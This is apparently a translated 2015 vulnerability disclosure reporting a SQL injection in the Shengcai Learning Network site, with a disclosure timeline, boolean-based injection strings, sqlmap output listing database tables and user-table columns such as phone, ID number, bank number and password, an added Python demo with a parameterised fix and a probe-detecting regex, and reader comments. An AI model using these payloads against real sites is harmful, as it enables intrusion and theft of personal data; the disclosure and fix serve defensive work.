Vulnerability summary
Followers: 24
Title: SQL injection in Shengcai Learning Network (圣才学习网) leaks the administrator account and 200,000 user records (including phone numbers, email addresses, QQ numbers and other sensitive data)
Submitted: 2015-05-18 00:32
Fixed: 2015-07-02 00:54
Published: 2015-07-02 00:54
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 15
Status: Confirmed by vendor
Tags: none
Vulnerability details
Disclosure timeline:
2015-05-18: Details sent to the vendor; awaiting vendor action
2015-05-18: Vendor confirmed; details visible to the vendor only
2015-05-28: Details opened to core white hats and domain experts
2015-06-07: Details opened to regular white hats
2015-06-17: Details opened to intern white hats
2015-07-02: Details opened to the public
Brief description:
Background: Shengcai Learning Network (圣才学习网) is the official learning site of Shengcai Education. It comprises 50 specialised sub-sites covering postgraduate and doctoral entrance exams, English, economics, securities, finance, insurance, management, foreign trade, accounting, statistics, actuarial science, psychology, education, law, medicine, journalism and communication, editing and publishing, engineering, IT, national vocational qualifications, civil service, secretarial work, Chinese language, tour guiding, academic competitions and more. It is a new site, and its reach seems fair. A SQL injection in Shengcai Learning Network leaks the administrator account plus 200,000 user records.
Details:
1. Shengcai Learning Network
2. Vulnerable URL (login required)
3. Injection statements (boolean-based: the true condition returns data, the false one returns none):
   2015051416054192' and '123'='123   (data returned)
   2015051416054192' and '123'='12   (no data)
   2015051416054192' and 1=(select @@VERSION) and '123'='123   (version string)
   2015051416054192' and 1=db_name() and '123'='123   (database name)
4. Captured request
5. Run through SqlMap
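The probe pairs listed in step 3 work because the request parameter is spliced straight into the SQL text, so the true condition keeps the original row and the false one removes it. The following added example (not code from the report or from the site) reproduces that behaviour against an in-memory SQLite table with constructed rows, places the parameterised fix beside the weak pattern, and includes a simple request-log check for the quote-plus-tautology shape of such probes. SQLite has no @@VERSION or db_name(), so only the generic '123'='123 pair is exercised; the table layout, row values and the `lookup_*` function names are assumptions for the demonstration.

```python
import re
import sqlite3

# Constructed sample data (not from the report): a tiny Member-like table.
SAMPLE_ROWS = [
    ("2015051416054192", "alice", "alice@example.invalid"),
    ("2015051416054193", "bob", "bob@example.invalid"),
]

# The two probes quoted in the report, verbatim.
TRUE_PROBE = "2015051416054192' and '123'='123"
FALSE_PROBE = "2015051416054192' and '123'='12"


def make_db() -> sqlite3.Connection:
    """Build an in-memory database with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Member (Id TEXT, Name TEXT, Email TEXT)")
    conn.executemany("INSERT INTO Member VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, member_id: str) -> list:
    """Weak pattern: the request parameter becomes part of the SQL grammar."""
    sql = "SELECT Name, Email FROM Member WHERE Id = '" + member_id + "'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn: sqlite3.Connection, member_id: str) -> list:
    """Fix: bind the value as a parameter; the driver never parses it as SQL."""
    sql = "SELECT Name, Email FROM Member WHERE Id = ?"
    return conn.execute(sql, (member_id,)).fetchall()


# Detection helper (assumed, for log review): a closing quote followed by
# AND/OR and a comparison, e.g.  ' and '123'='123
PROBE_RE = re.compile(r"'\s*(and|or)\s+'?\w+'?\s*=\s*'?\w+", re.IGNORECASE)


def looks_like_boolean_probe(param_value: str) -> bool:
    """True when a parameter value has the shape of a boolean-based probe."""
    return bool(PROBE_RE.search(param_value))


def demo() -> dict:
    """Row counts for each lookup/probe combination."""
    conn = make_db()
    return {
        "vuln_true": len(lookup_vulnerable(conn, TRUE_PROBE)),    # 1: row kept
        "vuln_false": len(lookup_vulnerable(conn, FALSE_PROBE)),  # 0: row dropped
        "safe_true": len(lookup_hardened(conn, TRUE_PROBE)),      # 0: no such Id
        "safe_false": len(lookup_hardened(conn, FALSE_PROBE)),    # 0: no such Id
        "safe_plain": len(lookup_hardened(conn, "2015051416054192")),  # 1
    }


if __name__ == "__main__":
    print(demo())
    print(looks_like_boolean_probe(TRUE_PROBE), looks_like_boolean_probe("2015051416054192"))
```

With the concatenated query the true/false pair is distinguishable by row count, which is exactly the oracle the report's step 3 describes; with the bound parameter both probes are just an Id that does not exist, so the oracle disappears without any input filtering. The regex is a coarse triage aid for request logs, not a substitute for the parameterised query.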
Proof of vulnerability:
1. Manual injection output
2. Version information
3. Database
4. Username
5. Administrator record
   (MD5 hashes were not cracked.)
6. User tables
Database: SCEbook
[146 tables]
+------------------------------------+
| AdminRight                         |
| AdminRole                          |
| AdminUser                          |
| Advertisement                      |
| Agent                              |
| AllMemberInfo                      |
| All_TJ                             |
| All_TJ_Download_Exam               |
| All_TJ_Download_Exam_TK            |
| All_TJ_Download_XXSub              |
| All_TJ_TK                          |
| ApplePrice                         |
| BankList                           |
| BlackListIP                        |
| BookAgent                          |
| BookRelate                         |
| Config                             |
| ConfigCode                         |
| CorpInfo                           |
| Data                               |
| DataCategory                       |
| DataCheckReason                    |
| DataOperate                        |
| DataReport                         |
| DictionaryTable                    |
| DomainCategory                     |
| EBookArr                           |
| EBookConverting                    |
| EBookIdAndAgent                    |
| EBookIdAndAgentRenda               |
| EBook_Media                        |
| Ebook                              |
| EbookActMember                     |
| EbookAdvertisement                 |
| EbookCategory                      |
| EbookCategoryFTP                   |
| EbookCategorySub                   |
| EbookCategorySub_Ebook             |
| EbookCheckReason                   |
| EbookComment                       |
| EbookCommentReply                  |
| EbookDemo                          |
| EbookDraft                         |
| EbookEvaluateSetting               |
| EbookExpire                        |
| EbookFeedBack                      |
| EbookFeedBackReply                 |
| EbookGroup                         |
| EbookGroupElement                  |
| EbookOperate                       |
| EbookPwd                           |
| EbookPwdGenerate                   |
| EbookRecommend                     |
| EbookRecommendDetail               |
| EbookXueXi                         |
| Ebook_Apple                        |
| Ebook_Dangdang                     |
| EditorTool                         |
| EmailTemplate                      |
| Experience                         |
| FeeItem                            |
| FileInFolder                       |
| FolderCategory                     |
| FolderCategorySub                  |
| FolderCategorySub_Ebook            |
| FolderCategory_TJ                  |
| Help                               |
| HelpCategory                       |
| IpAddress                          |
| Log                                |
| MaterialPackage                    |
| MaterialRegistrationCodeModel      |
| Member                             |
| MemberAttr                         |
| MemberBankList                     |
| MemberBuy                          |
| MemberBuy_Stolen                   |
| MemberBuy_del                      |
| MemberClass                        |
| MemberClassRight                   |
| MemberFocus                        |
| MemberInstitute                    |
| MemberInvoice                      |
| MemberNetDisk                      |
| MemberOrder                        |
| MemberOrderPay                     |
| MemberRight                        |
| MemberRightItem                    |
| MemberRightItemCategory            |
| MemberSearchTJ                     |
| Menu                               |
| Message                            |
| MobileAdvisement                   |
| MobileInstructImage                |
| MobileInterfaceLimit               |
| MoneyWater                         |
| News                               |
| PageSeo                            |
| PayConfiguration                   |
| PlatBookDownLoad                   |
| PlatBookDownLoading                |
| PlatBookDownload_LastDay           |
| PlatBookDownload_LastMonth         |
| PlatBookDownload_LastYear          |
| PlatBookPublish                    |
| PlatBookPublishAndPlatBookDownLoad |
| PlatBookPublish_EbookTK            |
| PlatBookPublish_EbookTK_WithHezuo  |
| PlatCross                          |
| PricePasswordTJ                    |
| QQOpenId                           |
| Question                           |
| QuestionReply                      |
| QuoteProduct                       |
| RegistrationAttr                   |
| RegistrationCodeBatch              |
| RegistrationCodeBatch_bak          |
| RegistrationCodeModel              |
| RegistrationCodeModelBak           |
| RegistrationCodeModel_del          |
| ScNetDisk                          |
| Score                              |
| ScoreExchange                      |
| ScoreWater                         |
| TestCatTree                        |
| Tree                               |
| UserSearchTJ                       |
| VEbookAndApple                     |
| VEbookDownLoadCount                |
| VRenda                             |
| V_FavorAndDownloadList             |
| V_MemberBuyInfo                    |
| VarSize                            |
| View_1                             |
| View_2                             |
| View_EbookAndTb_E_QuestionPlan     |
| View_MemberOrderForCenterU         |
| Word                               |
| WordCategory                       |
| XXProductBuy                       |
| XXProductBuy_TJ                    |
| XXProductBuy_TJ_exam               |
| book                               |
| tempT                              |
| v_AliveCodeEBook                   |
| v_AliveCodeTiKu                    |
+------------------------------------+

Database: SCEbook
Table: Member
[60 columns]
+----------------------+----------+
| Column               | Type     |
+----------------------+----------+
| Address              | varchar  |
| AddTime              | datetime |
| AllUserId            | int      |
| BankNo               | varchar  |
| CellPhone            | varchar  |
| CertificateApplyTime | datetime |
| CertificateType      | int      |
| City                 | varchar  |
| Class                | int      |
| client_key           | varchar  |
| ContactMan           | nchar    |
| ContactQQ            | nchar    |
| ContactTel           | nchar    |
| CorpLogo             | varchar  |
| CostermerServiceQQ   | nvarchar |
| CostermerServiceTel  | nvarchar |
| DomainName           | nvarchar |
| Education            | varchar  |
| Email                | varchar  |
| EndTime              | datetime |
| Id                   | varchar  |
| IdNo                 | varchar  |
| IsAgency             | int      |
| IsCertificate        | int      |
| IsDefaultSign        | int      |
| IsForbidden          | int      |
| IsValidEmail         | int      |
| LoginCount           | int      |
| MemberAdmin          | int      |
| MemberLogo           | nvarchar |
| Name                 | varchar  |
| NickName             | varchar  |
| OauthType            | int      |
| OfficialWebSite1     | nvarchar |
| OfficialWebSite2     | nvarchar |
| OpenId               | varchar  |
| PayNo                | varchar  |
| Phone                | varchar  |
| Photo                | varchar  |
| PostCode             | varchar  |
| Publisher            | nvarchar |
| Pwd                  | varchar  |
| QQ                   | varchar  |
| RealName             | varchar  |
| RecentLoginIp        | varchar  |
| RecentLoginProvince  | varchar  |
| RecentLoginTime      | datetime |
| RegIp                | varchar  |
| RegProvince          | varchar  |
| SendKeyTime          | datetime |
| Sex                  | varchar  |
| SiteIntroduction     | ntext    |
| SiteName             | nvarchar |
| SiteSign             | ntext    |
| StartTime            | datetime |
| TenpayNo             | varchar  |
| ValidEmail           | varchar  |
| ValidEmailKey        | varchar  |
| Writer               | varchar  |
| WriterBrief          | varchar  |
+----------------------+----------+

Database: SCEbook
Table: AllMemberInfo
[73 columns]
+----------------------+----------+
| Column               | Type     |
+----------------------+----------+
| Address              | varchar  |
| AddTime              | datetime |
| BankNo               | varchar  |
| CellPhone            | varchar  |
| CertificateApplyTime | datetime |
| CertificateType      | int      |
| City                 | varchar  |
| Class                | int      |
| client_key           | varchar  |
| ContactMan           | nchar    |
| ContactQQ            | nchar    |
| ContactTel           | nchar    |
| CorpLogo             | varchar  |
| CostermerServiceQQ   | nvarchar |
| CostermerServiceTel  | nvarchar |
| DomainName           | nvarchar |
| Education            | varchar  |
| Email                | varchar  |
| EndTime              | datetime |
| Expr1                | varchar  |
| Expr2                | datetime |
| Ext1                 | varchar  |
| Ext10                | varchar  |
| Ext2                 | varchar  |
| Ext3                 | varchar  |
| Ext4                 | varchar  |
| Ext5                 | varchar  |
| Ext6                 | varchar  |
| Ext7                 | varchar  |
| Ext8                 | varchar  |
| Ext9                 | varchar  |
| Id                   | varchar  |
| IdNo                 | varchar  |
| IsAgency             | int      |
| IsCertificate        | int      |
| IsCheck              | bit      |
| IsDefaultSign        | int      |
| IsForbidden          | int      |
| IsValidEmail         | int      |
| LicencePic           | varchar  |
| LoginCount           | int      |
| MemberAdmin          | int      |
| MemberLogo           | nvarchar |
| Name                 | varchar  |
| NickName             | varchar  |
| OauthType            | int      |
| OfficialWebSite1     | nvarchar |
| OfficialWebSite2     | nvarchar |
| OpenId               | varchar  |
| PayNo                | varchar  |
| Phone                | varchar  |
| Photo                | varchar  |
| PostCode             | varchar  |
| Publisher            | nvarchar |
| Pwd                  | varchar  |
| QQ                   | varchar  |
| RealName             | varchar  |
| RecentLoginIp        | varchar  |
| RecentLoginProvince  | varchar  |
| RecentLoginTime      | datetime |
| RegIp                | varchar  |
| RegProvince          | varchar  |
| SendKeyTime          | datetime |
| Sex                  | varchar  |
| SiteIntroduction     | ntext    |
| SiteName             | nvarchar |
| SiteSign             | ntext    |
| StartTime            | datetime |
| TenpayNo             | varchar  |
| ValidEmail           | varchar  |
| ValidEmailKey        | varchar  |
| Writer               | varchar  |
| WriterBrief          | varchar  |
+----------------------+----------+
7. Proof of the 200,000 records
Stopping here; this should count as fairly serious.
Fix recommendation:
Vulnerability response
Vendor response:
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-05-18 00:53
Vendor reply: Thanks
Latest status: none
Rating:
Comments
2015-05-15 17:31 |
sql小神 ( Passer-by | Rank:19 Vulnerabilities:4 | Some vulnerabilities can be reported, some cannot. )
2015-05-15 18:06 |
harbour_bin ( Regular white hat | Rank:358 Vulnerabilities:47 | Marching toward the TOP 200! )
2015-05-15 18:28 |
sql小神 ( Passer-by | Rank:19 Vulnerabilities:4 | Some vulnerabilities can be reported, some cannot. )
@harbour_bin The Hangzhou metro is plastered with this ad; I thought you'd spotted it while riding the metro.
2015-05-15 18:45 |
harbour_bin ( Regular white hat | Rank:358 Vulnerabilities:47 | Marching toward the TOP 200! )
@sql小神 Oh, heh. A couple of days ago I wanted to download some material, tried it out of habit, and this is what happened.